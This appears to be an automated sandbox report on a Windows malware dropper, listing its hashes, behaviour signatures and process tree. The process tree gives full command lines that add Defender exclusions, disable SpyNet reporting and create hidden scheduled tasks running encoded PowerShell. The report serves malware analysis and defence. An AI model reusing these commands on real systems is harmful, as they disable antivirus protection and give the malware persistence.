Analysis
-
max time kernel
146s -
max time network
168s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
11/10/2023, 13:57
Static task
static1
General
-
Target
d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe
-
Size
7.2MB
-
MD5
003ea8527cca0c944c4a162efcd8331c
-
SHA1
3e324382b6f22126fec9ae8bbf392e0e4e4074c1
-
SHA256
d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83
-
SHA512
c641e822418cbd6b22f766e522d94a60eca28e79a6c668abf97ae5bcfedc38a960c9e04ae1fb2de9aa746ed6c30fd88b7936bc0bef5a45488e16cd5da13e6eaa
-
SSDEEP
196608:91Oj/QD3bbGvrIhzX2Gf91o7R8F8biEmoY:3OTQLbbGzYX2GV1aR/m
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 39 3476 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2204032094-4125186646-761438227-1000\Control Panel\International\Geo\Nation MaHAxPh.exe -
Executes dropped EXE 4 IoCs
pid Process 4528 Install.exe 764 Install.exe 3508 QcWKUqX.exe 2396 MaHAxPh.exe -
Loads dropped DLL 1 IoCs
pid Process 3476 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json MaHAxPh.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json MaHAxPh.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini MaHAxPh.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini QcWKUqX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_B32BDFD39580912ADAFF73B3D36E1BB5 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_ECD931CC6FBF9F061BE09F2505FD40C3 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_7D28090A46C74E41A9A3E66B91EADD47 MaHAxPh.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_B32BDFD39580912ADAFF73B3D36E1BB5 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_ECD931CC6FBF9F061BE09F2505FD40C3 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_7D28090A46C74E41A9A3E66B91EADD47 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA MaHAxPh.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol MaHAxPh.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 MaHAxPh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA MaHAxPh.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol QcWKUqX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat MaHAxPh.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak MaHAxPh.exe File created C:\Program Files (x86)\lyspIhhmnAebC\gBEzgeU.xml MaHAxPh.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi MaHAxPh.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak MaHAxPh.exe File created C:\Program Files (x86)\PPPvEJXwvFXU2\zjzXXKcNlkrbF.dll MaHAxPh.exe File created C:\Program Files (x86)\PPPvEJXwvFXU2\fGkpfET.xml MaHAxPh.exe File created C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR\FBXAUDU.dll MaHAxPh.exe File created C:\Program Files (x86)\aGyefaDRXtWeAIGeOjR\sUrAPHq.xml MaHAxPh.exe File created C:\Program Files (x86)\fWbXzUMxesUn\ScMPkNS.dll MaHAxPh.exe File created C:\Program Files (x86)\JOahYsgOU\jXKNkb.dll MaHAxPh.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi MaHAxPh.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja MaHAxPh.exe File created C:\Program Files (x86)\JOahYsgOU\njUjCDq.xml MaHAxPh.exe File created C:\Program Files (x86)\lyspIhhmnAebC\uYiesed.dll MaHAxPh.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ArbjabrdjJSwhHH.job schtasks.exe File created C:\Windows\Tasks\ithrobiXMVHzunXcc.job schtasks.exe File created C:\Windows\Tasks\bEXFrSIllLhpZteWiQ.job schtasks.exe File created C:\Windows\Tasks\OhbVxWOWyrnkKLyjv.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2600 schtasks.exe 2952 schtasks.exe 4524 schtasks.exe 508 schtasks.exe 2104 schtasks.exe 4400 schtasks.exe 4480 schtasks.exe 3776 schtasks.exe 428 schtasks.exe 2304 schtasks.exe 2704 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer MaHAxPh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{90ceb0bd-0000-0000-0000-d01200000000} MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{90ceb0bd-0000-0000-0000-d01200000000}\NukeOnDelete = "0" MaHAxPh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1832 powershell.EXE 1832 powershell.EXE 1832 powershell.EXE 392 powershell.exe 392 powershell.exe 392 powershell.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 4880 powershell.EXE 4880 powershell.EXE 4880 powershell.EXE 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe 2396 MaHAxPh.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1832 powershell.EXE Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 4880 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5048 wrote to memory of 4528 5048 d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe 71 PID 5048 wrote to memory of 4528 5048 d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe 71 PID 5048 wrote to memory of 4528 5048 d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe 71 PID 4528 wrote to memory of 764 4528 Install.exe 72 PID 4528 wrote to memory of 764 4528 Install.exe 72 PID 4528 wrote to memory of 764 4528 Install.exe 72 PID 764 wrote to memory of 3816 764 Install.exe 74 PID 764 wrote to memory of 3816 764 Install.exe 74 PID 764 wrote to memory of 3816 764 Install.exe 74 PID 764 wrote to memory of 3080 764 Install.exe 75 PID 764 wrote to memory of 3080 764 Install.exe 75 PID 764 wrote to memory of 3080 764 Install.exe 75 PID 3816 wrote to memory of 2148 3816 forfiles.exe 78 PID 3816 wrote to memory of 2148 3816 forfiles.exe 78 PID 3816 wrote to memory of 2148 3816 forfiles.exe 78 PID 3080 wrote to memory of 4284 3080 forfiles.exe 79 PID 3080 wrote to memory of 4284 3080 forfiles.exe 79 PID 3080 wrote to memory of 4284 3080 forfiles.exe 79 PID 2148 wrote to memory of 532 2148 cmd.exe 80 PID 2148 wrote to memory of 532 2148 cmd.exe 80 PID 2148 wrote to memory of 532 2148 cmd.exe 80 PID 4284 wrote to memory of 4180 4284 cmd.exe 81 PID 4284 wrote to memory of 4180 4284 cmd.exe 81 PID 4284 wrote to memory of 4180 4284 cmd.exe 81 PID 2148 wrote to memory of 4984 2148 cmd.exe 82 PID 2148 wrote to memory of 4984 2148 cmd.exe 82 PID 2148 wrote to memory of 4984 2148 cmd.exe 82 PID 4284 wrote to memory of 2740 4284 cmd.exe 83 PID 4284 wrote to memory of 2740 4284 cmd.exe 83 PID 4284 wrote to memory of 2740 4284 cmd.exe 83 PID 764 wrote to memory of 2952 764 Install.exe 84 PID 764 wrote to memory of 2952 764 Install.exe 84 PID 764 wrote to memory of 2952 764 Install.exe 84 PID 764 wrote to memory of 1780 764 Install.exe 86 PID 764 wrote to memory of 1780 764 Install.exe 86 PID 764 wrote to memory of 1780 764 Install.exe 86 PID 1832 wrote to memory of 2720 1832 powershell.EXE 90 PID 1832 wrote to memory of 2720 1832 powershell.EXE 90 PID 764 wrote to memory of 4880 764 Install.exe 95 PID 764 wrote to memory of 4880 764 Install.exe 95 PID 764 wrote to memory of 4880 764 Install.exe 95 PID 764 wrote to memory of 4480 764 Install.exe 97 PID 764 wrote to memory of 4480 764 Install.exe 97 PID 764 wrote to memory of 4480 764 Install.exe 97 PID 3508 wrote to memory of 392 3508 QcWKUqX.exe 100 PID 3508 wrote to memory of 392 3508 QcWKUqX.exe 100 PID 3508 wrote to memory of 392 3508 QcWKUqX.exe 100 PID 392 wrote to memory of 3344 392 powershell.exe 102 PID 392 wrote to memory of 3344 392 powershell.exe 102 PID 392 wrote to memory of 3344 392 powershell.exe 102 PID 3344 wrote to memory of 4932 3344 cmd.exe 103 PID 3344 wrote to memory of 4932 3344 cmd.exe 103 PID 3344 wrote to memory of 4932 3344 cmd.exe 103 PID 392 wrote to memory of 4300 392 powershell.exe 104 PID 392 wrote to memory of 4300 392 powershell.exe 104 PID 392 wrote to memory of 4300 392 powershell.exe 104 PID 392 wrote to memory of 428 392 powershell.exe 105 PID 392 wrote to memory of 428 392 powershell.exe 105 PID 392 wrote to memory of 428 392 powershell.exe 105 PID 392 wrote to memory of 1980 392 powershell.exe 106 PID 392 wrote to memory of 1980 392 powershell.exe 106 PID 392 wrote to memory of 1980 392 powershell.exe 106 PID 392 wrote to memory of 4256 392 powershell.exe 107 PID 392 wrote to memory of 4256 392 powershell.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe"C:\Users\Admin\AppData\Local\Temp\d499dd84796241fb14b8b42d7dcdabf8027b93399c781e7257c5e795a88b5e83.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\7zSBAA5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\7zSBC4B.tmp\Install.exe.\Install.exe /gdidHgl "385121" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:532
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4984
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4180
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2740
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEZAcYlvF" /SC once /ST 09:20:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEZAcYlvF"4⤵PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEZAcYlvF"4⤵PID:4880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEXFrSIllLhpZteWiQ" /SC once /ST 13:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HsWwSWsMcedATsTYz\EAgXFEACPULOvsO\QcWKUqX.exe\" Ss /Ehsite_idyEn 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4480
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2720
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2956
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2612
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1236
-
